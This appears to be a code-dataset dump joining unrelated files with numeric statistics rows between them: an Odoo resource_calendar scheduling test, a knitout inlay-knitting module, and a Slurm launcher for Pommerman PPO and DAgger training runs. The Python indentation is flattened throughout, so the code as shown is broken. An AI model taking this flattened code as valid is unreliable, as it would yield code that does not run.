# current day, limited at 09:00 because of day_dt specified -> 1 hour
self.assertEqual(res[-1][0], datetime.strptime('2013-02-12 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-1][1], datetime.strptime('2013-02-12 09:00:00', _format), 'resource_calendar: wrong hours scheduling')
# previous days: 5+7 hours / 8 hours / 5+7 hours -> 32 hours
self.assertEqual(res[-2][0], datetime.strptime('2013-02-08 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-2][1], datetime.strptime('2013-02-08 23:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-3][0], datetime.strptime('2013-02-08 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-3][1], datetime.strptime('2013-02-08 13:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-4][0], datetime.strptime('2013-02-05 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-4][1], datetime.strptime('2013-02-05 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-5][0], datetime.strptime('2013-02-01 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-5][1], datetime.strptime('2013-02-01 23:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-6][0], datetime.strptime('2013-02-01 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-6][1], datetime.strptime('2013-02-01 13:00:00', _format), 'resource_calendar: wrong hours scheduling')
# 7 hours remaining
self.assertEqual(res[-7][0], datetime.strptime('2013-01-29 09:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[-7][1], datetime.strptime('2013-01-29 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
# Compute scheduled hours
td = timedelta()
for item in res:
td += item[1] - item[0]
self.assertEqual(seconds(td) / 3600.0, 40.0, 'resource_calendar: wrong hours scheduling')
# --------------------------------------------------
# Test2: schedule hours forward (old interval_get)
# --------------------------------------------------
# res = self.resource_calendar.interval_get(cr, uid, self.calendar_id, self.date1, 40, resource=False, byday=True)
# (datetime.datetime(2013, 2, 12, 9, 0), datetime.datetime(2013, 2, 12, 16, 0))
# (datetime.datetime(2013, 2, 15, 8, 0), datetime.datetime(2013, 2, 15, 13, 0))
# (datetime.datetime(2013, 2, 15, 16, 0), datetime.datetime(2013, 2, 15, 23, 0))
# (datetime.datetime(2013, 2, 22, 8, 0), datetime.datetime(2013, 2, 22, 13, 0))
# (datetime.datetime(2013, 2, 22, 16, 0), datetime.datetime(2013, 2, 22, 23, 0))
# (datetime.datetime(2013, 2, 26, 8, 0), datetime.datetime(2013, 2, 26, 16, 0))
# (datetime.datetime(2013, 3, 1, 8, 0), datetime.datetime(2013, 3, 1, 9, 0))
res = self.resource_calendar.schedule_hours(
cr, uid, self.calendar_id, 40,
day_dt=self.date1.replace(minute=0, second=0), context=context
)
self.assertEqual(res[0][0], datetime.strptime('2013-02-12 09:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[0][1], datetime.strptime('2013-02-12 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[1][0], datetime.strptime('2013-02-15 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[1][1], datetime.strptime('2013-02-15 13:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[2][0], datetime.strptime('2013-02-15 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[2][1], datetime.strptime('2013-02-15 23:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[3][0], datetime.strptime('2013-02-19 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[3][1], datetime.strptime('2013-02-19 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[4][0], datetime.strptime('2013-02-22 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[4][1], datetime.strptime('2013-02-22 13:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[5][0], datetime.strptime('2013-02-22 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[5][1], datetime.strptime('2013-02-22 23:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[6][0], datetime.strptime('2013-02-26 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[6][1], datetime.strptime('2013-02-26 09:00:00', _format), 'resource_calendar: wrong hours scheduling')
td = timedelta()
for item in res:
td += item[1] - item[0]
self.assertEqual(seconds(td) / 3600.0, 40.0, 'resource_calendar: wrong hours scheduling')
# res = self.resource_calendar.interval_get(cr, uid, self.calendar_id, self.date1, 40, resource=self.resource1_id, byday=True)
# (datetime.datetime(2013, 2, 12, 9, 0), datetime.datetime(2013, 2, 12, 16, 0))
# (datetime.datetime(2013, 2, 15, 8, 0), datetime.datetime(2013, 2, 15, 13, 0))
# (datetime.datetime(2013, 2, 15, 16, 0), datetime.datetime(2013, 2, 15, 23, 0))
# (datetime.datetime(2013, 3, 1, 8, 0), datetime.datetime(2013, 3, 1, 13, 0))
# (datetime.datetime(2013, 3, 1, 16, 0), datetime.datetime(2013, 3, 1, 23, 0))
# (datetime.datetime(2013, 3, 5, 8, 0), datetime.datetime(2013, 3, 5, 16, 0))
# (datetime.datetime(2013, 3, 8, 8, 0), datetime.datetime(2013, 3, 8, 9, 0))
res = self.resource_calendar.schedule_hours(
cr, uid, self.calendar_id, 40,
day_dt=self.date1.replace(minute=0, second=0),
compute_leaves=True,
resource_id=self.resource1_id, context=context
)
self.assertEqual(res[0][0], datetime.strptime('2013-02-12 09:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[0][1], datetime.strptime('2013-02-12 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[1][0], datetime.strptime('2013-02-15 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[1][1], datetime.strptime('2013-02-15 13:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[2][0], datetime.strptime('2013-02-15 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[2][1], datetime.strptime('2013-02-15 23:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[3][0], datetime.strptime('2013-02-19 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[3][1], datetime.strptime('2013-02-19 09:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[4][0], datetime.strptime('2013-02-19 12:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[4][1], datetime.strptime('2013-02-19 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[5][0], datetime.strptime('2013-02-22 08:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[5][1], datetime.strptime('2013-02-22 09:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[6][0], datetime.strptime('2013-02-22 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[6][1], datetime.strptime('2013-02-22 23:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[7][0], datetime.strptime('2013-03-01 11:30:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[7][1], datetime.strptime('2013-03-01 13:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[8][0], datetime.strptime('2013-03-01 16:00:00', _format), 'resource_calendar: wrong hours scheduling')
self.assertEqual(res[8][1], datetime.strptime('2013-03-01 22:30:00', _format), 'resource_calendar: wrong hours scheduling')
td = timedelta()
for item in res:
td += item[1] - item[0]
self.assertEqual(seconds(td) / 3600.0, 40.0, 'resource_calendar: wrong hours scheduling')
# --------------------------------------------------
# Test3: working hours (old _interval_hours_get)
# --------------------------------------------------
# old API: resource without leaves
# res: 2 weeks -> 40 hours
res = self.resource_calendar._interval_hours_get(
cr, uid, self.calendar_id,
self.date1.replace(hour=6, minute=0),
self.date2.replace(hour=23, minute=0) + relativedelta(days=7),
resource_id=self.resource1_id, exclude_leaves=True, context=context)
self.assertEqual(res, 40.0, 'resource_calendar: wrong _interval_hours_get compatibility computation')
# new API: resource without leaves
# res: 2 weeks -> 40 hours
res = self.resource_calendar.get_working_hours(
cr, uid, self.calendar_id,
self.date1.replace(hour=6, minute=0),
self.date2.replace(hour=23, minute=0) + relativedelta(days=7),
compute_leaves=False, resource_id=self.resource1_id, context=context)
self.assertEqual(res, 40.0, 'resource_calendar: wrong get_working_hours computation')
# old API: resource and leaves
# res: 2 weeks -> 40 hours - (3+4) leave hours
res = self.resource_calendar._interval_hours_get(
cr, uid, self.calendar_id,
self.date1.replace(hour=6, minute=0),
self.date2.replace(hour=23, minute=0) + relativedelta(days=7),
resource_id=self.resource1_id, exclude_leaves=False, context=context)
self.assertEqual(res, 33.0, 'resource_calendar: wrong _interval_hours_get compatibility computation')
# new API: resource and leaves
# res: 2 weeks -> 40 hours - (3+4) leave hours
res = self.resource_calendar.get_working_hours(
cr, uid, self.calendar_id,
self.date1.replace(hour=6, minute=0),
self.date2.replace(hour=23, minute=0) + relativedelta(days=7),
compute_leaves=True, resource_id=self.resource1_id, context=context)
self.assertEqual(res, 33.0, 'resource_calendar: wrong get_working_hours computation')
# --------------------------------------------------
# Test4: misc
# --------------------------------------------------
# Test without calendar and default_interval
res = self.resource_calendar.get_working_hours(
cr, uid, None,
self.date1.replace(hour=6, minute=0),
self.date2.replace(hour=23, minute=0),
compute_leaves=True, resource_id=self.resource1_id,
default_interval=(8, 16), context=context)
self.assertEqual(res, 32.0, 'resource_calendar: wrong get_working_hours computation')
self.att0_0_id = self.resource_attendance.create(
cr, uid, {
'name': 'Att0',
'dayofweek': '0',
'hour_from': 7.5,
'hour_to': 12.5,
'calendar_id': self.calendar_id,
}, context=context
)
self.att0_1_id = self.resource_attendance.create(
cr, uid, {
'name': 'Att0',
'dayofweek': '0',
'hour_from': 13,
'hour_to': 14,
'calendar_id': self.calendar_id,
}, context=context
)
date1 = datetime.strptime('2013-02-11 07:30:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime('2013-02-11 14:00:00', '%Y-%m-%d %H:%M:%S')
res = self.resource_calendar.get_working_hours(
cr, uid, self.calendar_id,
date1,
date2,
compute_leaves=False, resource_id=self.resource1_id, context=context)
# 7h30 -> 12h30 = 5 / 13h -> 14h = 1 / -> 6h
self.assertEqual(res, 6, 'resource_calendar: wrong get_working_hours computation')
def test_50_calendar_schedule_days(self):
""" Testing calendar days scheduling """
cr, uid = self.cr, self.uid
_format = '%Y-%m-%d %H:%M:%S'
# --------------------------------------------------
# Test1: with calendar
# --------------------------------------------------
res = self.resource_calendar.schedule_days_get_date(cr, uid, self.calendar_id, 5, day_date=self.date1, context={'tz': 'UTC'})
self.assertEqual(res.date(), datetime.strptime('2013-02-26 00:0:00', _format).date(), 'resource_calendar: wrong days scheduling')
res = self.resource_calendar.schedule_days_get_date(cr, uid, self.calendar_id, -2, day_date=self.date1, context={'tz': 'UTC'})
self.assertEqual(res.date(), datetime.strptime('2013-02-08 00:00:00', _format).date(), 'resource_calendar: wrong days scheduling')
res = self.resource_calendar.schedule_days_get_date(
cr, uid, self.calendar_id, 5, day_date=self.date1,
compute_leaves=True, resource_id=self.resource1_id, context={'tz': 'UTC'})
self.assertEqual(res.date(), datetime.strptime('2013-03-01 00:0:00', _format).date(), 'resource_calendar: wrong days scheduling')
# --------------------------------------------------
# Test2: misc
# --------------------------------------------------
# Without calendar, should only count days -> 12 -> 16, 5 days with default intervals
res = self.resource_calendar.schedule_days_get_date(cr, uid, None, 5, day_date=self.date1, default_interval=(8, 16), context={'tz': 'UTC'})
self.assertEqual(res, datetime.strptime('2013-02-16 16:00:00', _format), 'resource_calendar: wrong days scheduling')
def seconds(td):
assert isinstance(td, timedelta)
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10.**6
| 70.195876
| 174
| 0.635365
| 4,553
| 34,045
| 4.638041
| 0.060839
| 0.12426
| 0.12033
| 0.101056
| 0.873846
| 0.852204
| 0.813705
| 0.781361
| 0.769617
| 0.750154
| 0
| 0.091589
| 0.190865
| 34,045
| 484
| 175
| 70.340909
| 0.674992
| 0.197063
| 0
| 0.386207
| 0
| 0
| 0.305088
| 0
| 0
| 0
| 0
| 0
| 0.42069
| 1
| 0.024138
| false
| 0
| 0.010345
| 0
| 0.041379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b845544e3b6da79ea2cd2389adbdcb6ce830ea44
| 5,383
|
py
|
Python
|
library/inlay.py
|
kausalyamahadevan/knitout-frontend-py
|
1a0414a88db698383dda7e9b45ec1293948b369b
|
[
"MIT"
] | null | null | null |
library/inlay.py
|
kausalyamahadevan/knitout-frontend-py
|
1a0414a88db698383dda7e9b45ec1293948b369b
|
[
"MIT"
] | null | null | null |
library/inlay.py
|
kausalyamahadevan/knitout-frontend-py
|
1a0414a88db698383dda7e9b45ec1293948b369b
|
[
"MIT"
] | null | null | null |
import numpy as np
import math
def inlayKnit(k,beg,end,length,cRib,cInlay,siderib='l',bed1='f',roller=400,stitch=4,speed=400):
'''can take in tuck array where 1s represent tucks and 0s represent misses
or puts tucks only at edges'''
#set beds
if bed1=='f':
bed2='b'
else:
bed2='f'
# #make tuck array
# if len(tuckarray)!=0:
# repeatSize = len(stitcharray)
# totalRepeatsHoriz=int(math.ceil(float(end-beg)/repeatSize))
# array = np.tile(stitcharray,totalRepeatsHoriz+2)
tuckarray=np.zeros(end,int)
for i in range(beg,end,5):
if i%2==0:
tuckarray[i]=1
else:
tuckarray[i]=-1
if (end)%2==0:
tuckarray[end-1]=-1
else:
tuckarray[end-1]=1
#set starting side
if siderib == 'l':
start=1
else:
start=2
length=length+1
for b in range(start,length+1):
if b%2==1:
k.rollerAdvance(roller)
k.stitchNumber(stitch)
k.speedNumber(speed)
for w in range(beg,end):
if w%2==0: #knits odds on front
k.knit('+',(bed1,w),cRib)
else:
k.knit('+',(bed2,w),cRib)
k.rollerAdvance(0)
k.stitchNumber(2)
k.speedNumber(speed)
for w in range(end-1,beg-1,-1):
if tuckarray[w]==1:
k.drop((bed2,w))
elif tuckarray[w]==-1:
k.drop((bed1,w))
for w in range(beg,end):
if tuckarray[w]==1:
k.tuck('+',(bed2,w),cInlay)
elif tuckarray[w]==-1:
k.tuck('+',(bed1,w),cInlay)
else:
k.miss('+',(bed2,w),cInlay)
else:
k.rollerAdvance(roller)
k.stitchNumber(stitch)
k.speedNumber(speed)
for w in range(end-1,beg-1,-1):
if w%2==0: #knits odds on front
k.knit('-',(bed1,w),cRib)
else:
k.knit('-',(bed2,w),cRib)
k.rollerAdvance(0)
k.stitchNumber(stitch)
k.speedNumber(speed)
for w in range(beg,end):
if tuckarray[w]==1:
k.drop((bed2,w))
elif tuckarray[w]==-1:
k.drop((bed1,w))
for w in range(end-1,beg-1,-1):
if tuckarray[w]==1:
k.tuck('-',(bed2,w),cInlay)
elif tuckarray[w]==-1:
k.tuck('-',(bed1,w),cInlay)
else:
k.miss('-',(bed2,w),cInlay)
def inlaySeed(k,beg,end,length,cRib,cInlay,inlayside='l',ribside='l',bed1='f',roller=400,stitch=4,speed=400):
'''can take in tuck array where 1s represent tucks and 0s represent misses
or puts tucks only at edges'''
#set beds
if bed1=='f':
bed2='b'
else:
bed2='f'
#set starting side
if ribside == 'l':
start=1
else:
start=2
length=length+1
for b in range(start,length+1):
if b%2==1:
k.rollerAdvance(roller)
k.stitchNumber(stitch)
k.speedNumber(speed)
for w in range(beg,end):
if w%2==0: #knits odds on front
k.knit('+',(bed1,w),cRib)
else:
k.knit('+',(bed2,w),cRib)
k.rollerAdvance(0)
k.stitchNumber(stitch)
k.speedNumber(speed)
k.drop((bed2,end))
k.drop((bed2,beg-1))
if b!=length:
if inlayside=='l':
k.tuck('+',(bed2,beg-1),cInlay)
k.tuck('+',(bed2,end),cInlay)
else:
k.tuck('-',(bed2,end),cInlay)
k.tuck('-',(bed2,beg-1),cInlay)
k.rollerAdvance(0)
k.stitchNumber(2)
k.speedNumber(100)
for w in range(beg,end):
if w%2==0: #knits odds on front
k.xfer((bed1,w),(bed2,w))
else:
k.xfer((bed2,w),(bed1,w))
else:
k.rollerAdvance(roller)
k.stitchNumber(stitch)
k.speedNumber(speed)
for w in range(end-1,beg-1,-1):
if w%2==0: #knits odds on front
k.knit('-',(bed2,w),cRib)
else:
k.knit('-',(bed1,w),cRib)
k.rollerAdvance(0)
k.stitchNumber(stitch)
k.speedNumber(speed)
k.drop((bed2,beg-1))
k.drop((bed2,end))
if b!=length:
if inlayside=='l':
k.tuck('-',(bed2,end),cInlay)
k.tuck('-',(bed2,beg-1),cInlay)
else:
k.tuck('+',(bed2,beg-1),cInlay)
k.tuck('+',(bed2,end),cInlay)
k.rollerAdvance(0)
k.stitchNumber(2)
k.speedNumber(100)
for w in range(beg,end):
if w%2==0: #knits odds on front
k.xfer((bed2,w),(bed1,w))
else:
k.xfer((bed1,w),(bed2,w))
| 27.464286
| 109
| 0.434516
| 650
| 5,383
| 3.598462
| 0.127692
| 0.029927
| 0.025652
| 0.047029
| 0.832835
| 0.81274
| 0.782813
| 0.782813
| 0.76956
| 0.751603
| 0
| 0.045557
| 0.420955
| 5,383
| 195
| 110
| 27.605128
| 0.704844
| 0.102731
| 0
| 0.857143
| 0
| 0
| 0.007715
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014286
| false
| 0
| 0.014286
| 0
| 0.028571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b8b8b7657b8682869c406095c6943dd851e5fb5d
| 146,694
|
py
|
Python
|
pommerman/research/cinjon_run_on_cluster.py
|
cinjon/playground
|
ad9ec58b2157fa6102636e7f61ef9a712c507a90
|
[
"Apache-2.0"
] | 1
|
2019-01-04T13:36:04.000Z
|
2019-01-04T13:36:04.000Z
|
pommerman/research/cinjon_run_on_cluster.py
|
cinjon/playground
|
ad9ec58b2157fa6102636e7f61ef9a712c507a90
|
[
"Apache-2.0"
] | null | null | null |
pommerman/research/cinjon_run_on_cluster.py
|
cinjon/playground
|
ad9ec58b2157fa6102636e7f61ef9a712c507a90
|
[
"Apache-2.0"
] | 1
|
2018-03-21T15:21:52.000Z
|
2018-03-21T15:21:52.000Z
|
"""Run on the cluster
NOTE: See local_config.template.py for a local_config template.
"""
import os
import sys
import itertools
import local_config
directory = local_config.cluster_directory
email = local_config.email
slurm_logs = os.path.join(directory, "slurm_logs")
slurm_scripts = os.path.join(directory, "slurm_scripts")
if not os.path.exists(slurm_logs):
os.makedirs(slurm_logs)
if not os.path.exists(slurm_scripts):
os.makedirs(slurm_scripts)
abbr = {
'lr': 'lr',
'board-size': 'bs',
'how-train': 'ht-',
'num-steps': 'ns',
'distill-epochs': 'dstlepi',
'num-battles-eval': 'nbe',
'gamma': 'gma',
'set-distill-kl': 'sdkl',
'num-processes': 'np',
'config': 'cfg-',
"max-aggregate-agent-states": "maxaggr",
'model-str': 'm-',
'num-mini-batch': 'nmbtch',
'minibatch-size': 'mbs',
'log-interval': 'log',
'save-interval': 'sav',
'expert-prob': 'exprob',
'num-steps-eval': 'nse',
'use-value-loss': 'uvl',
'num-episodes-dagger': 'ned',
'num-mini-batch': 'nmb',
'use-lr-scheduler': 'ulrs',
'half-lr-epochs': 'hlre',
'use-gae': 'gae',
'init-kl-factor': 'ikl',
'state-directory-distribution': 'sdd',
'anneal-bomb-penalty-epochs': 'abpe',
'begin-selfbombing-epoch': 'bsbe',
'item-reward': 'itr',
'use-second-place': 'usp',
'use-both-places': 'ubp',
'mix-frozen-complex': 'mfc',
'adapt-threshold': 'adpt',
}
def train_ppo_job(flags, jobname=None, is_fb=False, partition="uninterrupted"):
num_processes = flags["num-processes"]
jobname = jobname or 'pman'
jobnameattrs = '%s.%s' % (
jobname, '.'.join(['%s%s' % (abbr[k], str(flags[k])) for k in sorted(flags.keys()) if k in abbr])
)
jobcommand = "python train_ppo.py "
args = ["--%s %s" % (flag, str(flags[flag])) for flag in sorted(flags.keys())]
jobcommand += " ".join(args)
print(jobcommand)
slurmfile = os.path.join(slurm_scripts, jobnameattrs + '.slurm')
with open(slurmfile, 'w') as f:
f.write("#!/bin/bash\n")
f.write("#SBATCH --job-name" + "=" + jobname + "\n")
f.write("#SBATCH --output=%s\n" % os.path.join(slurm_logs, jobnameattrs + ".out"))
f.write("#SBATCH --error=%s\n" % os.path.join(slurm_logs, jobnameattrs + ".err"))
if is_fb:
f.write("#SBATCH --partition=%s\n" % partition)
else:
f.write("#SBATCH --qos=batch\n")
f.write("#SBATCH --mail-type=END,FAIL\n")
f.write("#SBATCH --mail-user=%s\n" % email)
f.write("module purge\n")
local_config.write_extra_sbatch_commands(f)
f.write(jobcommand + "\n")
if is_fb:
s = "sbatch --gres=gpu:1 --nodes=1 "
else:
s = "sbatch --qos batch --gres=gpu:1 --nodes=1 "
s += "--cpus-per-task=%s " % num_processes
s += "--mem=64000 --time=72:00:00 %s &" % os.path.join(
slurm_scripts, jobnameattrs + ".slurm")
os.system(s)
def train_dagger_job(flags, jobname=None, is_fb=False, partition="uninterrupted"):
num_processes = flags["num-processes"]
jobname = jobname or 'pmandag'
jobnameattrs = '%s.%s' % (
jobname, '.'.join(['%s%s' % (abbr[k], str(flags[k])) for k in sorted(flags.keys()) if k in abbr])
)
jobcommand = "CUDA_VISIBLE_DEVICES=0 python train_dagger.py "
args = ["--%s %s" % (flag, str(flags[flag])) for flag in sorted(flags.keys())]
jobcommand += " ".join(args)
print(jobcommand)
slurmfile = os.path.join(slurm_scripts, jobnameattrs + '.slurm')
with open(slurmfile, 'w') as f:
f.write("#!/bin/bash\n")
f.write("#SBATCH --job-name" + "=" + jobname + "\n")
f.write("#SBATCH --output=%s\n" % os.path.join(slurm_logs, jobnameattrs + ".out"))
f.write("#SBATCH --error=%s\n" % os.path.join(slurm_logs, jobnameattrs + ".err"))
if is_fb:
f.write("#SBATCH --partition=%s\n" % partition)
else:
f.write("#SBATCH --qos=batch\n")
f.write("#SBATCH --mail-type=END,FAIL" + "\n")
f.write("#SBATCH --mail-user=%s\n" % email)
f.write("module purge" + "\n")
local_config.write_extra_sbatch_commands(f)
f.write(jobcommand + "\n")
if is_fb:
s = "sbatch --gres=gpu:1 --nodes=1 "
else:
s = "sbatch --qos batch --gres=gpu:1 --nodes=1 "
s += "--cpus-per-task=%s " % num_processes
s += "--mem=64000 --time=72:00:00 %s &" % os.path.join(
slurm_scripts, jobnameattrs + ".slurm")
os.system(s)
### These were all attempts to do KL distilling into the PPO Policy. None of them worked well.
### ... But they kinda shouldnt because they are using the FFA one.
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0003,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 2500,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0001,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 2500,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0003,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 2000,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0001,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "distill-epochs": 2000,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0003,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "set-distill-kl": 1.0,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
# train_ppo_job({
# "num-processes": 8,
# "run-name": "fresh",
# "how-train": "homogenous",
# "num-steps": 100,
# "log-interval": 150,
# "lr": 0.0001,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "set-distill-kl": 1.0,
# "distill-target": "dagger::/home/resnick/Code/selfplayground/thisone-dagger-save-eval-env-done-rand-seed.ht-dagger.cfg-PommeFFA-v3.m-PommeCNNPolicySmall.nc-256.lr-0.005-.mb-5000.ns-5000.num-0.epoch-580.steps-34860000.seed-0.pt",
# "restart-counts": "",
# "config": "PommeTeam-v0",
# "eval-mode": "homogenous",
# "num-battles-eval": 50,
# "gamma": ".995"
# })
### These are trying to have PPO learn to play with a simple agent against two other simple agents. None of them worked well.
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma995", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.0001,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma995", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v3", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma995", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0001,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
# {"num-processes": 8, "run-name": "gma995", "how-train": "simple", "num-steps": 100, "log-interval": 100,
# "log-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/logs/",
# "save-dir": "/misc/kcgscratch1/ChoGroup/resnick/selfplayground/models/",
# "config": "PommeTeamShort-v0", "gamma": ".995", "lr": 0.0003,
# "model-str": "PommeCNNPolicySmaller",
# }
# )
# train_ppo_job(
